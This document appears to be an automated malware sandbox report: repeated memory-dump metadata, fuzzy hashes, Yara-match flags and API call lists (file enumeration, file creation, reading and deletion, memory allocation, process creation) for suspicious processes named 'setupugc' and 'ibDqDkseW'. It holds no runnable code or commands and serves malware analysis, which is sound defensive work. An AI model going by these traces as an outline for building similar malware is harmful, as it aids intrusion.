                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                           • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: Bl$l
                          • API String ID: 3446177414-208461968
                          • Opcode ID: ac5a3a9db94f3220375c55df44de5c9e0c36d9dae118d3175c58f0db38cad2db
                          • Instruction ID: b7ca231814555b9493435eb62475e9d21aba49611637d286707fe4fb3af39564
                          • Opcode Fuzzy Hash: ac5a3a9db94f3220375c55df44de5c9e0c36d9dae118d3175c58f0db38cad2db
                          • Instruction Fuzzy Hash: 62A1F771E003198BEF31DF99C880BAEB7B1BB64304F4640EAD5096B661DB74AE85CF51
                          APIs
                          • __startOneArgErrorHandling.LIBCMT ref: 014D5E34
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                           • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: ErrorHandling__start
                          • String ID: pow
                          • API String ID: 3213639722-2276729525
                          • Opcode ID: 2f57f312358f5b8a2fa7140e10da81781d1630a7b593856ec5ff5dc85bf5b3c1
                          • Instruction ID: 274980763c74f1fe44cf6ed7344772b1915d38ba7c942c9c973d66d374255cf2
                          • Opcode Fuzzy Hash: 2f57f312358f5b8a2fa7140e10da81781d1630a7b593856ec5ff5dc85bf5b3c1
                          • Instruction Fuzzy Hash: 6951797190820696DF22B72CC93136F2BA4EB42790F15C95FE4E58E3B9DE34C4968B46
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                           • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID: 0$Flst
                          • API String ID: 0-758220159
                          • Opcode ID: eb457a6e20e6b98f1d09149a57166ffcb00c4d6037719d2fa179f4fb165722b3
                          • Instruction ID: f5ed93d6df23ffe8391d9ec7eeb3de4aedbaa489da33eb4f17734c283d25f35c
                          • Opcode Fuzzy Hash: eb457a6e20e6b98f1d09149a57166ffcb00c4d6037719d2fa179f4fb165722b3
                          • Instruction Fuzzy Hash: 40516AB5E002048FDF66DF99D69466EFBF4BF44B14F19802ED0499B2A1E7709946CB80
                          APIs
                          • RtlDebugPrintTimes.NTDLL ref: 014BD959
                            • Part of subcall function 01494859: RtlDebugPrintTimes.NTDLL ref: 014948F7
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                           • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: $$$
                          • API String ID: 3446177414-233714265
                          • Opcode ID: dfc8d8787aa098d13e3cb6146e3f33ce9ffd10e828ee4fb290f3593f3ae15f3c
                          • Instruction ID: 163c60e3d5be96ab191bc53c644d5c9bbd244801c69182a5967f8a3cbd722a42
                          • Opcode Fuzzy Hash: dfc8d8787aa098d13e3cb6146e3f33ce9ffd10e828ee4fb290f3593f3ae15f3c
                          • Instruction Fuzzy Hash: A651F271E003469FDB25DFA8C4847DEBBB1BF54318F15409EC9256B3A1D770A94ACBA0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                           • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: $
                          • API String ID: 3446177414-3993045852
                          • Opcode ID: 0e707dee8a97a274df40b88a11ff03c8dff82d3a0c302980215eff0be3793eae
                          • Instruction ID: 30fa28f00f7396aa8a6a2d52a7305df4891777936045d7bfefc219dd640ea563
                          • Opcode Fuzzy Hash: 0e707dee8a97a274df40b88a11ff03c8dff82d3a0c302980215eff0be3793eae
                          • Instruction Fuzzy Hash: AF417EB5A00209AFDB22DF99D840AEEBBB5FF48B04F14001AE914AB391C7719D15DBA0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                           • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: 0$0
                          • API String ID: 3446177414-203156872
                          • Opcode ID: 8740a1f1ebc275b1b2e60c0881269205c31ec6932bda2ecbdae84b9bb53e4c25
                          • Instruction ID: 089c63b664173f908530663dcb109af3554921a9f2476ea61e7bbf1eb82554a2
                          • Opcode Fuzzy Hash: 8740a1f1ebc275b1b2e60c0881269205c31ec6932bda2ecbdae84b9bb53e4c25
                          • Instruction Fuzzy Hash: 07417CB1A087069FC310DF28C494A1BBBE4BB89318F04492EF588DB361D771E906CB96

                          Execution Graph

                          Execution Coverage:2.6%
                          Dynamic/Decrypted Code Coverage:4.1%
                          Signature Coverage:1.5%
                          Total number of Nodes:464
                          Total number of Limit Nodes:75
                           execution_graph (rendered graph; nodes that resolve to an API, grouped by API, with the call-site / stub addresses recorded in the graph)
                           • CoInitialize: 2e6f440
                           • CreateProcessInternalW: 2e796ee
                           • CreateThread: 2e59bdd
                           • FindClose: 2e6c646
                           • FindFirstFileW: 2e6c5f3
                           • FindNextFileW: 2e6c634
                           • GetFileAttributesW: 2e682b0, 2e682d8
                           • LdrInitializeThunk: 2e60770, 2e65a40, 2e66460, 2e66630, 2e66930, 2e66ec0, 2e68040, 2e746c0, 2e78900, 2e78ad0, 2e78da0, 3932ad0, 3932ba0, 3932c1f, 3932c60, 3932c70, 3932ca0, 3932d10, 3932dd0, 3932df0, 3932e80, 3932ee0, 3932f30, 3932fb0, 39335c0, 39339b0, 3934340, 3934650
                           • LdrLoadDll: 2e64470, 2e644d0, 2e72d80
                           • NtAllocateVirtualMemory: 2e794db, 2e7b2e0
                           • NtClose: 2e66460, 2e66630, 2e66930, 2e792d0, 2e792fb
                           • NtCreateFile: 2e7909d
                           • NtDeleteFile: 2e792bd
                           • NtReadFile: 2e791fd
                           • PostThreadMessageW: 2e60d4c
                           • RtlAllocateHeap: 2e7960e, 2e7b450, 2e7b490
                           • RtlDosPathNameToNtPathName_U: 2e7822b
                           • RtlFreeHeap: 2e69f20, 2e6a060, 2e6a3d0, 2e6daa0, 2e7965b, 2e7b370
                           • SetErrorMode: 2e680ce
                           • Sleep: 2e73aa0
                           • Collapsed nodes ("2 API calls"): 2e661d0, 2e67cc0, 2e7c660

                          Control-flow Graph
                          • Function 2e59c00 (basic blocks 2e59c00-2e5a413, call to 2e7afd0 at 2e5a3c7)
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: $-$&$)$,$-$4$5$9$;$E$Er$HU$L$N$N$X)$Y$Y4$[$a$a:M$e$f($h|$j$n7$t4$td$~o$H
                          • API String ID: 0-1478878621
                          APIs
                          • FindFirstFileW.KERNELBASE(?,00000000), ref: 02E6C604
                          • FindNextFileW.KERNELBASE(?,00000010), ref: 02E6C63F
                          • FindClose.KERNELBASE(?), ref: 02E6C64A
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNext
                          • String ID:
                          • API String ID: 3541575487-0
                          APIs
                          • NtCreateFile.NTDLL(?,?,?,?,4A9873AC,?,?,?,?,?,?), ref: 02E790CE
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          APIs
                          • NtReadFile.NTDLL(?,?,?,?,4A9873AC,?,?,?,?), ref: 02E79226
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          APIs
                          • NtAllocateVirtualMemory.NTDLL(02E61CBB,?,02E77EEF,00000000,4A9873AC,00003000,?,?,?,?,?,02E77EEF,02E61CBB), ref: 02E794F8
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateMemoryVirtual
                          • String ID:
                          • API String ID: 2167126740-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: DeleteFile
                          • String ID:
                          • API String ID: 4033686569-0
                          APIs
                          • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02E79304
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 3h8t0-08$3h8t0-08$a~V
                          • API String ID: 0-2215303234

